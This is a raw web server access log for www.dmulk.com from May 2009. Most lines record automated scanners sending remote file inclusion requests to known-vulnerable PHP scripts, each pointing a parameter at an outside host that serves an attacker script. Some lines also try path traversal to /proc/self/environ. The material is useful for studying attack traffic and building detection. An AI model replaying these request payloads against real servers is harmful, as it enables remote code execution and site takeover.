218.27.203.107 - - [19/May/2009:09:38:46 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:38:46 -0700] "GET /logs/access_080228.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:38:47 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:02 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_search_rank.php?shop_this_skin_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:02 -0700] "GET /logs/access_081201.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_search_rank.php?shop_this_skin_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:02 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_search_rank.php?shop_this_skin_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:02 -0700] "GET /logs/access_081201.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:02 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:02 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:02 -0700] "GET /logs/access_081201.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_search_rank.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:02 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_search_rank.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:03 -0700] "GET /logs/access_081201.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_search_rank.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:03 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_search_rank.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:39:03 -0700] "GET /phphtml.php?htmlclass_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:39:03 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:39:03 -0700] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:05 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_search_rank.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:39:05 -0700] "GET /logs/access_090507.log%20%20//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:05 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_search_rank.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
70.132.9.55 - - [19/May/2009:09:39:06 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:39:06 -0700] "GET /logs/access_081201.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:39:07 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.132.9.55 - - [19/May/2009:09:39:08 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.132.9.55 - - [19/May/2009:09:39:08 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.36 - - [19/May/2009:09:39:12 -0700] "GET //vwar/backup/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.132.9.55 - - [19/May/2009:09:39:15 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.132.9.55 - - [19/May/2009:09:39:16 -0700] "GET /logs/access_080723.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.36 - - [19/May/2009:09:39:16 -0700] "GET /logs/access_080902.log%20%20///vwar/backup/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.36 - - [19/May/2009:09:39:16 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.132.9.55 - - [19/May/2009:09:39:26 -0700] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.36 - - [19/May/2009:09:39:26 -0700] "GET /logs/access_081021.log%20%20///vwar/backup/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:39:33 -0700] "GET /logs/access_080907.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:42 -0700] "GET /logs/access_090117.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_search_rank.php?shop_this_skin_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:42 -0700] "GET /logs/access_090117.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:43 -0700] "GET /logs/access_090117.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_search_rank.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
208.94.173.99 - - [19/May/2009:09:39:43 -0700] "GET /logs/access_090117.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_search_rank.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:39:57 -0700] "GET /logs/access_080425.log%20%20//?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:40:00 -0700] "GET /logs/access_080614.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:40:01 -0700] "GET /logs/access_071223.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:40:01 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:40:01 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.145.152.113 - - [19/May/2009:09:40:10 -0700] "GET /logs/access_081104.log//modules/errors.php?error=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.145.152.113 - - [19/May/2009:09:40:10 -0700] "GET /modules/errors.php?error=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.145.152.113 - - [19/May/2009:09:40:10 -0700] "GET /logs//modules/errors.php?error=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:40:14 -0700] "GET /logs/access_080521.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:40:29 -0700] "GET /logs/access_080925.log%20%20//include/bbs.lib.inc.php?site_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:41:09 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:41:09 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:41:10 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:41:10 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:41:10 -0700] "GET /logs/access_080512.log//skin/zero_vote/ask_password.php?dir=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:41:12 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:41:12 -0700] "GET /logs/access_080512.log//skin/zero_vote/ask_password.php?dir=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:41:13 -0700] "GET /logs/access_090502.log//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:41:14 -0700] "GET /logs/access_080331.log//skin/zero_vote/ask_password.php?dir=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.60.64.14 - - [19/May/2009:09:41:20 -0700] "GET /logs/access_090405.log//songinfo.php?commonpath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:41:21 -0700] "GET /logs/access_080630.log%20%20//include/bbs.lib.inc.php?site_path=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:41:24 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:41:24 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:41:26 -0700] "GET /logs/access_080512.log%20%20//skin/zero_vote/ask_password.php?dir=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:41:31 -0700] "GET /logs/access_080331.log%20%20//skin/zero_vote/ask_password.php?dir=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:41:55 -0700] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://kita.hexat.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:41:55 -0700] "GET /logs/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://kita.hexat.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:41:55 -0700] "GET /logs/access_081010.log%20%20/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://kita.hexat.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:41:57 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:41:57 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:41:57 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:41:57 -0700] "GET /logs/access_090119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:42:04 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:42:04 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:42:08 -0700] "GET /logs/access_080619.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:42:08 -0700] "GET /logs/access_080925.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:42:20 -0700] "GET /logs/access_080819.log%20%20/phphtml.php?htmlclass_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:42:39 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:42:39 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.16.54 - - [19/May/2009:09:42:39 -0700] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/list??? HTTP/1.1" 200 100196 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
218.38.16.54 - - [19/May/2009:09:42:41 -0700] "GET /?_zb_path=http://ssdnb.net/bbs/data/list??? HTTP/1.1" 200 42057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:42:43 -0700] "GET /logs/access_080619.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:42:43 -0700] "GET /logs/access_080925.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:09:42:55 -0700] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:09:42:55 -0700] "GET /logs/access_080619.log%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:09:42:55 -0700] "GET /logs/access_080925.log%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:09:42:58 -0700] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:43:13 -0700] "GET /logs/access_090507.log//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:43:18 -0700] "GET /logs/access_090501.log%20%20/phphtml.php?htmlclass_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.246.98.78 - - [19/May/2009:09:43:37 -0700] "GET /logs/access_081007.log%20%20//includes/write.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:43:57 -0700] "GET /logs/access_071212.log%20%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:43:59 -0700] "GET /logs/access_080902.log%20%20///vwar/backup/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:43:59 -0700] "GET //vwar/backup/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:44:02 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:44:04 -0700] "GET /logs/access_090119.log%20%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.180.234.156 - - [19/May/2009:09:44:53 -0700] "GET /logs/access_081114.log HTTP/1.1" 200 3300699 "-" "curl/7.18.2 (i386-pc-win32) libcurl/7.18.2 zlib/1.2.3" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:09:45:01 -0700] "GET /logs/access_081021.log%20%20///vwar/backup/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:09:45:02 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 100197 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:09:45:10 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 100197 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:45:11 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:09:45:13 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:09:45:13 -0700] "GET /logs/access_081007.log%20%20/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://kita.hexat.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:45:18 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.42 - - [19/May/2009:09:45:20 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:09:45:27 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:45:29 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:45:41 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:45:42 -0700] "GET /logs/access_080619.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:45:42 -0700] "GET /logs/access_080925.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:09:45:52 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 42074 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:09:46:01 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 500 292 "-" "libwww-perl/5.805" "www.dmulk.com"
216.129.119.47 - - [19/May/2009:09:46:01 -0700] "GET /?show=slide&pageid=181&nggpage=6 HTTP/1.0" 500 292 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "dmulk.com"
72.30.79.60 - - [19/May/2009:09:46:01 -0700] "GET /logs/access_080419.log HTTP/1.0" 200 1751361 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.126.110.134 - - [19/May/2009:09:46:09 -0700] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.126.110.134 - - [19/May/2009:09:46:09 -0700] "GET /logs/access_080522.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.126.110.134 - - [19/May/2009:09:46:09 -0700] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.126.110.134 - - [19/May/2009:09:46:09 -0700] "GET /logs/access_080617.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
